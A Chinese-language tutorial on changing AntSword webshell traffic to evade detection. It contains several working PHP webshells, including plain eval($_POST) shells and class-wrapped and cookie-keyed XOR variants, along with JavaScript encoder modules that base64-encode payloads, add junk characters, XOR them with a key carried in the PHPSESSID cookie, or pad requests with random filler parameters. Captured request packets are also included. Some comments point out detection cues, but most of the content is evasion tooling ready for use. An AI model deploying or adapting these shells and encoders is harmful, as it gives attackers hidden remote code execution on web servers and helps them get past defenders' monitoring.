蚁剑流量传输改造之路
1、蚁剑默认的请求:列目录
php脚本:
<?php
// Bare webshell: the contents of POST parameter "1" are handed to eval() with
// no decoding or validation. Every variant later on this page keeps this sink
// and only changes how the payload is packaged on the wire.
eval($_POST[1]);
数据包:
1=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f32aa";echo @asenc($output);echo "f7538";}ob_start();try{$D=base64_decode($_POST["0xfb787fcf8ad1c"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R=" ".$T." ".@filesize($P)." ".$E." ";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&0xfb787fcf8ad1c=RDovcGhwc3R1ZHlfcHJvL1dXVy9kei9hcGkv
2、当蚁剑使用自带的base64编码器对目标发送请求:列目录
php脚本:
<?php
// Same one-line eval($_POST[1]) shell as in section 1. The encoder that follows
// changes only the transport (base64 + a decode stub); the eval() sink is unchanged.
eval($_POST[1]);
编码器:
// AntSword encoder (plain base64). Rewrites the pending request so the shell
// receives a base64 blob in a per-request parameter plus a one-line decode/eval stub.
//   pwd  - POST parameter name the shell reads (here "1")
//   data - request parameters; data['_'] holds the raw PHP to run
//   ext  - unused by this encoder
// Returns the mutated `data` object.
module.exports = (pwd, data, ext = {}) => {
    // Parameter name is re-rolled on every request, so detection must not key on it.
    let randomID = `_0x${Math.random().toString(16).substr(2)}`;
    data[randomID] = Buffer.from(data['_']).toString('base64');
    // The literal "eval(base64_decode($_POST[" stub is sent in clear text with every request.
    data[pwd] = `eval(base64_decode($_POST[${randomID}]));`;
    delete data['_'];
    return data;
}
数据包:
1=@eval(@base64_decode($_POST[_0xb6bfd60624d9c]));&0x2ed89fbf7ba82=RDovcGhwc3R1ZHlfcHJvL1dXVy9kei9hcGkv&_0xb6bfd60624d9c=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
3、干扰字符配合base64编码器:列目录
php脚本:
<?php
// Webshell variant that discards one leading junk character before decoding.
// The constructor is the only entry point; it is invoked with $_POST[1] below.
class ade{
    public $name = '';
    function __construct($name){
        $name[0] = ''; // blank out the first character (the paired encoder on this page prepends one random letter A-Z)
        $name = trim($name);
        // What remains is base64 of PHP source, decoded and executed verbatim.
        // Detection note: the eval(base64_decode(...)) sink is unchanged; only the
        // first byte of the parameter value differs from plain base64.
        eval(base64_decode($name));
    }
}
new ade($_POST[1]);
编码器:
// AntSword encoder paired with the "leading junk character" shell above.
//   pwd  - POST parameter name the shell reads
//   data - request parameters; data['_'] holds the raw PHP to run
// Prepends one random uppercase ASCII letter (char code 65-90) to the base64
// payload; the shell blanks that first character before decoding.
module.exports = (pwd, data) => {
    var random1 = String.fromCharCode(Math.floor(Math.random() * 26) + 65);
    data[pwd] = random1 + new Buffer(data['_']).toString('base64');
    delete data['_'];
    return data;
}
数据包:
1=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&y220853e6f7d8e=RDovcGhwc3R1ZHlfcHJvL1dXVy9kei8%3D
4、基于随机Cookie来加密的编码器:列目录
php木马:
PHP木马 <?php
// Webshell that XORs the base64-decoded POST body with a key carried in the
// PHPSESSID cookie. Nothing is executed until the destructor runs.
class Cookie {
    // Misused as a decoder: returns the XOR-decoded payload instead of initialising state.
    function __construct() {
        $key=@$_COOKIE['PHPSESSID'];   // key material supplied by the client on every request
        @$post=base64_decode($_POST['1']);
        for($i=0;$i<strlen($post);$i++){
            // byte-wise XOR; the key is indexed modulo 26 (the paired encoder sends a 26-char value)
            $post[$i] = $post[$i] ^ $key[$i%26];
        }
        return $post;
    }
    // Runs at object teardown (script end). Detection note: eval() is still the
    // sink, and the PHPSESSID value is not a session id but the decryption key,
    // so the request alone contains everything needed to recover the plaintext.
    function __destruct() {return @eval($this->__construct());}
}
$check=new Cookie();
?>
编码器:
'use strict';
// code by yzddmr6
// AntSword encoder (XOR with a cookie-borne key). Per request: derive a key from a
// random id, place it in the Cookie header as PHPSESSID, XOR the
// eval(base64_decode("...")) stub with it and base64-encode the result.
//   pwd  - POST parameter name the shell reads
//   data - request parameters; data['_'] holds the raw PHP to run
//   ext  - AntSword request context; ext.opts.httpConf.headers is mutated here
module.exports = (pwd, data, ext = {}) => {
    let randomID = `x${Math.random().toString(16).substr(2)}`;
    function xor(payload) {
        let crypto = require('crypto');
        // md5 hex is 32 chars; dropping the first 6 leaves the 26 the shell indexes with i % 26.
        let key = crypto.createHash('md5').update(randomID).digest('hex').substr(6);
        // The key travels in the same request as the ciphertext, so anyone holding
        // the captured request can decode it; this is obfuscation, not confidentiality.
        ext.opts.httpConf.headers['Cookie'] = 'PHPSESSID=' + key;
        key = key.split("").map(t => t.charCodeAt(0));
        let cipher = payload.split("").map(t => t.charCodeAt(0));
        for (let i = 0; i < cipher.length; i++) {
            cipher[i] = cipher[i] ^ key[i % 26]
        }
        cipher = cipher.map(t => String.fromCharCode(t)).join("")
        cipher = Buffer.from(cipher).toString('base64');
        return cipher;
    }
    data['_'] = Buffer.from(data['_']).toString('base64');
    data[pwd] = `eval(base64_decode("${data['_']}"));`;
    data[pwd]=xor(data[pwd]);
    delete data['_'];
    return data;
}
数据包:
1=AURXWxpWWEFWAVVqB1YFXVwGGBQydFsUUWBdSGxvY1twX2FHAgYhQD9qVAVqbilKVVJ6TC1bQVB7XnhbeGMVdAABMAJgUGJGAWRhB1JxCEZXb2NbdHFYADtbNUY%2FAWoTUgRXVG45floGX3tYeHMAA1d0DQIAXjACXDt6QypwZRdUbjUFUGNGWV1lBl0Fcg9FBFt6C1MEWgJTKXIHAHFRR1dNa0RXbzNCB2s3C1pRelA5AWFRaAQqRFRZYFhbXGFNKnYIBAQAcgVqYVZYb1N%2BRT5lcEJ5d1IFaWAvWgFKJ1t3NHUCOgFlCH1PLQVsYHxbW0txdjhtLV8EX3UMenFaAlMpcgcAcV0AaGN3XVFOIFw6Xj8AdgliXDlnbgh%2FBVVEb1sLTl11dU4FdgRDKQFqGlVuEFhlJQFfPWp4W3xea1RpcDdfAQE0XnMgYlA2dg41ZnAXW1dwfFl0dlBAOGE6ASh2eRR%2BcghabzJbAS53bw5jcwBFaWBUXgJrL11yJmFGLAFbDHt1NnVmYwN7b2dLeiptF18%2FAFAVe3UpdWINemYxWFlBfk17Y2pvM1oqdlNEXCBycQEAYRRqdSZiVV5we1tLcWY7bSlHB2p2GVFhWkZ%2BMnlGKwEHW1B8d15WTjN7M2ZTZGwmRwEpdkBYZFoyf2JzRgdYdV9EO2YEWDJYCSJTWzVbbSZiRgdbUVxgXVJCVk4zZDNgNHd0CmJ5LEplNGBjJllvb2BYcnF5bS1iU0c8cXoqf1sIBVQYeUU1dWxHUHNvRldwDUE5YAFZbSBbRiwDdgpiYlVIUmB4Tl16elg4WCVJPGQBCVIEVgFtOXoGL3d0WlNjQV5QcDdMAWsrXXIlcUYvd3IWfHIDQnp0AgRyZkBcNF9TWiVhcRZ6cDJGfgZbXyhZdFpTY0FeUAUNAzlgAVltIFtDKlRcCHxfNnR6Xnt%2FcFhHRztcC3IHanYFanEPSnwiYmcvYV1cZmcNC3lyVUAqWl5bdApiZSwBYRJTBDFVfHJFQWlhYXgtXDFgKQEJD2kEC0V%2BImJ4KFtken0Ee1hRcFhPOWQ0QlsKV10xWlxWVmIQC28FdARgAFRYM20LWTxqelNRYVpGfiJiWi9qQltrBlFEenQrczZfLGJtCV9AL0p%2BFHpxMUZmWlZYXXcCWwIGLVs8AG0Me2IXCnhTdkwGAWAHUXxvAnh0CgI5dApecyBbAUEaHlo%3D&hcf070a6640049=RDovcGhwc3R1ZHlfcHJvL1dXVy9kei9hcmNoaXZlci8%3D
5、垃圾字符的添加配合编码器(随机Cookie)加密:列目录
'use strict';
// AntSword encoder: base64 payload padded with a burst of random filler parameters.
//   pwd  - POST parameter name the shell reads
//   data - request parameters; data['_'] holds the raw PHP to run
//   ext  - unused by this encoder
module.exports = (pwd, data, ext = {}) => {
    // Bounds for the filler: parameter-name length, value length, and parameter count.
    let varname_min = 5;
    let varname_max = 15;
    let data_min = 200;
    let data_max = 250;
    let num_min = 100;
    let num_max = 200;
    let randomID = `_0x${Math.random().toString(16).substr(2)}`;
    data[randomID] = Buffer.from(data['_']).toString('base64');
    function randomString(length) {
        //let chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
        let chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
        let result = '';
        for (let i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)];
        return result;
    }
    function randomInt(min, max) {
        return parseInt(Math.random() * (max - min + 1) + min, 10);
    }
    for (let i = 0; i < randomInt(num_min, num_max); i++) {
        data[randomString(randomInt(varname_min, varname_max))] = randomString(randomInt(data_min, data_max));
    }
    // The real payload is still a clear-text @eval(base64_decode($_POST[...])) stub.
    // Detection note: filler names and values are letters only, whereas the one
    // real parameter name starts with "_0x" and its value is base64.
    data[pwd] = `@eval(base64_decode($_POST[${randomID}]));`;
    delete data['_'];
    return data;
}
数据包:
1=B0MDCh1QUktUAg1nUgACC1wDTRoydFtNUDNbTzg%2BZF16VWNEWgt0Fjg8VAA%2FYClKVQt7HytcFQF8WHJRemBNeVVXN1RgVTdIAWRhXlMiDkEDPmRdfntaA2NWYBA4V2oWBwpXVG5gfwkAWC8Jf3UKCVV3VQ9VCDdUXD4vTSpwZU5VPTMCBDJBX1dvBF5df1oTAw16DgYKWgJTcHNUBnYFFlBLYU5VbGtPUj0wXVpUL145AWEIaVcsQwAIZ15RVmNOcntdUgNWcgA%2Fb1ZYbwp%2FFjhiJBN%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%2FXU5dcHsKKAp6EAYKDwdvClUJBnI0CFRlYlF6Z1IXZy0jEltUCQw7AVNUVS0gBgYxWVl4fXNDWwt4FQQiAQg%2FYDFfU29dDil2CRZ6W3pRfk1rQmY2Bg9cNQ4XKXthWngIV10AMWBba2xBdWMKYFU5VnZXBlYpX1VWYwMGbSwKVltUSH5Na2t6D1ATWS4nXgdkAlBTMjdaKTJGWWZRBQ1wX1pSKyx2XyxSF19uClkTK3YwNXpIRwFoBn8Ib1cGC2o%2BDVI5a3UIUDJbQCslZ154YEVYYApeEygnciAwVCljYlJeEy5MKxN%2FdWZMYVldVFIgUAhbVStQOQFiV3oxFgwtVHNIUQtnBFpwYFUqJ1NRP38PX3x7WlJAHEtd&phfvmOuxNYfcD=QplqMhpjCkoSwwaglLPLbCiHwsdgysFAkOfbBkjlAoEuBKZuKmKSiSSBIaiHQWcaCwvBPOJRBrrehNfremOrnhaCXFcFGaKjieXkMViTINqVpkqrMpTKBIOxvaXGGCGHuByDNGsMDnjfLDqUEVCqXKXdSpQjQuopVSQVNtnFvKFNOpMBHNwUwHRjwhWhPktQxbLPVSWooYMhbaiJETsHJZcfKVfPyrhAdfYIsZJGhNHfcEQOPK&IwghkoRg=PNRmNPbtWjuAlPRUDCRlpBraYVTTbtymAuijunHNXuqhbbcXifLzkNsPbRlDUvPwFqBnmQbywTwsdXQDzmmEgkTKSNNFgOnyjNmakeAXHxDTPbPHNYYCVceFwiVDIwwPLXcqOLOkPQAcsAHuofesghCxQeDQVucWkHOfZwOVDAVWdRNqQPPznPgGshIlfWWYZyFrjztPfYmFuFMGlOiFViRmDMSawiJNgDrEHrjWCLACUQTHvodoPnYF
参考文章:https://xz.aliyun.com/t/7126#toc-5
参考文章:https://xz.aliyun.com/t/6571